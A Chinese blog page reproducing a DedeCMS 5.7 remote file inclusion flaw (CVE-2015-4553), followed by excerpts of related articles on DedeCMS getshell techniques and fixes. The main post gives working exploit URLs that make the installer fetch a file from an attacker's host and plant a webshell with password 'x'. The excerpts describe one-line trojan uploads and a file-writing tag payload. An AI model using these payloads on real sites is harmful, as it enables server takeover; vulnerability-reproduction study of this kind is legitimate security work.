dedecms远程文件包含漏洞

最新推荐文章于 2024-08-03 16:08:16 发布
最新推荐文章于 2024-08-03 16:08:16 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: web安全 渗透测试 代码审计 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43778463/article/details/127715835
版权

利用前提存在重装漏洞
在这里插入图片描述

在自己网站准备一个远程文件
在这里插入图片描述

http://www.d.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=…/data/admin/config_update.php
在这里插入图片描述

http://www.d.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=1720.php&updateHost=http://www.a.com/
在这里插入图片描述

生成http://www.d.com/install/1720.php 密码 x,webshell连接

存在漏洞的代码

最低0.47元/天 解锁文章
漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
李火火的安全圈
05-31 4201
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
dedecmsv5.7sp1远程文件包含漏洞审计
安全大白
10-27 904
漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖以至于最后引起远程文件包含漏洞
php本地文件包含 截断,php远程文件包含截断问题
weixin_39951929的博客
03-13 415
今天在学习《白帽子讲web安全》一书是,提到一个php远程文件包含漏洞可以从攻击者服务器中的一个写好的攻击脚本中远程执行命令服务器中有漏洞的页面代码为:#test.php#error_reporting(0);$route="share";$basePath=$_GET['param'];if ($route == "share"){require_once $basePath.'/action/...
DedeCMS5.7远程文件包含漏洞分析
shelter1234567的博客
09-13 499
访问第二个payload,由于../data/admin/config_update.php为空 $updateHost失去了定义,可以被变量覆盖到, $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";利用 $install_demo_name可控的方式将config_update.php 写入空 让其中的$updateHost失去定义, 写入空执行找不到对应的文件为空, $sql_content 自然就为空。如果业务还有以下代码。
CVE-2023-2928 DedeCMS 文件包含漏洞getshell 漏洞分析
shelter1234567的博客
04-07 2261
这样的话一般的利用方式就不行了,好在cms没用禁用掉文件包含的逻辑,我们可以利用/admin/allowurl.txt 这个文件,实现文件包含任意代码执行。可以将用户输入的字符保存到/admin/allowurl.txt ,因为有stripslashes函数的过滤xss无效。file_manage_control.php 页面为用户提供了网站文件管理的功能,访问file_manage_control.php 利用文件包含构造1.php。尝试在php中或txt中添加php执行代码结果被检测了。
DedeCMS之文件上传漏洞
Loooyoooxooo的博客
12-08 961
1、此版本的DedeCMS后台存在文件上传漏洞,在渗透过程中我们可以通过利用其它漏洞或者暴力破解的方式获取管理员账号和密码,并登录到后台进行此漏洞利用(此实验主要练习文件DedeCMS上传漏洞利用);6、依次点击 “生成” - “更新主页HTML” - “浏览选择新建的模板”,在"主页位置"输入框中将文件后缀修改为.php,首页模式选择"生成静态",并点击更新主页HTML。>换成一句话木马<?7、进入生成的链接,成功执行php代码,漏洞测试成功,在进行动态的输出框中,点击"浏览"
DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553)
WY92139010的博客
08-14 1249
DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553) 一、漏洞描述 该漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖,以至于最后引起远程文件包含漏洞。 二、漏洞影响版本 DeDeCMS < 5.7-sp1,包括5.7 sp1版本 三、漏洞环境搭建 1、下载DeDeCMS V...
远程文件包含漏洞dedecms5.7 sp1版本漏洞复现)
kid的博客
06-05 6232
远程文件包含漏洞dedecms5.7 sp1版本漏洞复现) 前言 前面看一个视频提到这个漏洞的复现,自己觉得这种漏洞复现然后分析原因还是蛮有意思的,所以这里也来实现一下这个漏洞的复现,自己动手还是很重要的一个过程吧 过程 首先是搭建环境,phpstudy + dedecms5.7 sp1基本是一键安装 漏洞原因主要是在install的index.php文件中 foreach(Array('_...
dedecms最新版本存在远程包含漏洞--可getshell
pygain的博客
11-01 2322
小编最近发现,9月中旬发布的织梦CMS,由于管理员疏忽易存在远程包含漏洞,可getshell
【学习笔记】DedeCMS 5.7 /install/index.php 远程文件包含漏洞
chualam的博客
11-02 810
变量覆盖:用我们自己自定义的参数替换程序原有的变量值 一般需要结合程序其他功能来形成完整的攻击 原本带有变量覆盖功能的函数 extract 和prase_str 或者是全局变量导致的覆盖 $$key = $abc $key = '123' $123 = $abc 如果我们可以控制$key 就可以实现变量的覆盖 想想是否可以让require _once变成空 这样就可以成功覆盖了 ...
dede CMS最新采集规则
10-06
dede CMS 最新采集规则 包含 60多个各种采集规则
DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553)
末初 · mochu7
05-18 2726
文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞复现 漏洞原因 uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖,进而导致远程文件上传Getshell 漏洞影响版本 <= Dedecms V5.7 SP1的所有版本 漏洞原理分析 uploads/install/index.php 对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖,RunMagicQuotes()每个参数的值进行了特殊字符转义处理 继续分析 uploads/install/i
DedeCMS_v5.7_友情链接CSRF+任意文件写入漏洞
公众号shadow sock7
11-28 2924
参考:https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_v5.7_友情链接CSRF_GetShell 略鸡肋,需要管理员点击。 先在网站最下面点击“申请加入”,然后填入构造的网站链接: http://192.168.170.139:8888/dedecms_csrf.php 然后该链接需要服务器后台可以访问的地址即...
dedecms织梦 标签远程文件写入漏洞
weixin_34261415的博客
03-21 237
测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 前题条件,必须准备好自己的dede数据库,然后插入数据:   insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp =@fopen("1.php", \''a\'');@fwrite($fp, \''\''...
DeDeCMS-漏洞复现
weixin_57682301的博客
08-03 724
2.上传后访问你上传的一句话木马文件 我这里写的一句话木马为phpinfo,显示成功即可证明注入。4.点击生成--更新主页html,将htm后缀改成php并且生成静态,点击更新主页html。5.访问此页面,没有报错证明注入成功(由于没有回显,这里输入的POST传参)1.点击核心--文件式管理器 点击文件上传,将我们的一句话木马进行上传。2.进入后点击模板--默认模板管理,找到index.htm。3.点击右方的编辑进入后改成写入的一句话木马,然后点击保存。1.点击模板--广告管理--生成一个新广告。
DedeCMS_v5.7漏洞复现
热门推荐
qq_51459600的博客
04-06 1万+
DedeCMS_v5.7漏洞复现 环境搭建: 服务器:WinServer2008(10.10.10.143) + phpstudy2018 DedeCMS版本:DedeCMS-V5.7-UTF8-SP2 下载地址:https://pan.baidu.com/s/1GQjWSDe7IlMVsVJ7HvrBOw 提取码: i4wk 0x01 URL重定向 版本<=5.7sp2 漏洞复现 payload: http://10.10.10.143/Dedecms/plus/download.php?open
Dedecms织梦远程写文件漏洞
鸥鹭忘机
07-28 1217
基本信息 漏洞编号:SSV-89354 CVE-ID:CVE-2015-4553 漏洞类别:变量覆盖 实验版本:dedecms v5.7SP1(部分版本已修复) 利用条件:Apache,dedecms版本为v5.7SP且未修复,自备一台云主机 云主机ip:192.168.18.131 参考文章:http://blog.nsfocus.net/dedecms-write-file-vuln/ https://seclists.org/fulldisclosure/2015/Jun/47 2015年6月17日
c ++ 传递可变长度数组_学习C ++:可变范围
weixin_26737625的博客
08-23 661
c ++ 传递可变长度数组Variable scope refers to the ability of a variable to be “seen” in a program. A variable is seen if, in a specific place in a program, the programmer has access to that variable’s value. ...
织梦cms文件包含漏洞
最新发布
04-02
### 关于 Dedecms 文件包含漏洞的修复方法及利用方式 #### 背景概述 Dedecms 是一款广泛使用的开源内容管理系统 (CMS),由于其功能强大且易于部署,因此受到许多网站开发者的青睐。然而,在某些版本中可能存在文件包含漏洞,攻击者可以通过该漏洞执行任意代码或获取敏感数据。 --- #### 利用方式分析 文件包含漏洞通常发生在开发者未对用户输入进行严格过滤的情况下。例如,在 `include/dialog/select_images_post.php` 中第 38 行的位置,如果允许通过 URL 参数传递文件路径,则可能导致远程文件包含 (RFI) 或本地文件包含 (LFI)[^1]。 此外,如果程序逻辑中存在类似以下条件判断: ```php if(file_exists(INSLOCKFILE)) { exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!"); } ``` 而 `INSLOCKFILE` 的值可通过外部参数控制(如 `insLockfile=a&s_lang=a`),则可能绕过安装锁定机制并触发进一步的安全风险[^4][^5]。 --- #### 解决方案详解 ##### 方法一:加强正则表达式的校验规则 针对受影响的正则表达式部分,建议限定 `$cfg_imgtype` 只能匹配固定的合法文件扩展名列表。具体操作是在 `include/dialog/select_images_post.php` 文件中的第 38 行附近增加严格的白名单验证逻辑: ```php // 修改后的代码片段 $allowedExtensions = ['jpg', 'jpeg', 'png', 'gif']; $fileExtension = pathinfo($_FILES['uploadfile']['name'], PATHINFO_EXTENSION); if (!in_array(strtolower($fileExtension), $allowedExtensions)) { die('Invalid file type'); } ``` 此更改能够有效防止非法文件类型的上传和潜在的恶意脚本注入行为[^1]。 ##### 方法二:升级至最新稳定版 根据实际测试反馈,Dedecms v5.7 SP1 已经修复了多个已知漏洞,包括但不限于文件包含问题。强烈推荐管理员及时更新到官方发布的最新补丁版本以减少不必要的安全隐患[^3]。 ##### 方法三:启用更安全的加密协议配置 对于涉及 SSL/TLS 加密通信场景下的防护措施,应遵循现代密码学最佳实践指南,比如采用具备“安全”素数特性的 Diffie-Hellman 密钥交换算法,并将其长度设置为至少 2048 bits 或更高强度级别来抵御中间人攻击(MitM)以及 Logjam 类型威胁[^2]。 --- #### 额外注意事项 即使采取以上整改措施之后,仍需定期审查服务器端的日志记录以便快速响应任何异常活动迹象;同时也要教育内部员工提高网络安全意识水平,避免因人为失误造成二次损害发生。 ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值